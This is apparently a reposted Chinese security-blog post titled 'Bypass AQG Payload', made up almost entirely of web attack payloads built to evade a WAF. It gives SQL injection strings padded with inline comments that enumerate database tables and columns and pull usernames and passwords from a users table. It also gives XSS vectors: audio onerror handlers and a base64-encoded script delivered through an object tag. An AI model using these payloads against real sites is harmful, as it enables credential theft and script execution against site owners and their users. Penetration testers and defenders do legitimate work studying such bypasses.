[SQL Injection]
1,group_concat(table_name) /*%%!asd%%%%*/from /*%%!asd%%%%*/information_schema.tables where table_schema=database(/*%%!asd%%%%*/) --
1,group_concat(column_name) /*%%!asd%%%%*/from/*%%!asd%%%%*/information_schema.columns where table_name=’users’ -
1' union/*%%!asd%%%%*/select group_concat(user),group_concat(password) /*%%!asd%%%%*/from/*%%!asd%%%%*/users --+
[XSS]
<audio src=1 onerror=alert(/xss/);>
<audio src=1 onerror=prompt('xss');>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="></object>
详情请参考:https://www.freebuf.com/articles/web/254513.html
本文始发于微信公众号(Khan安全攻防实验室):Bypass AQG Payload
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论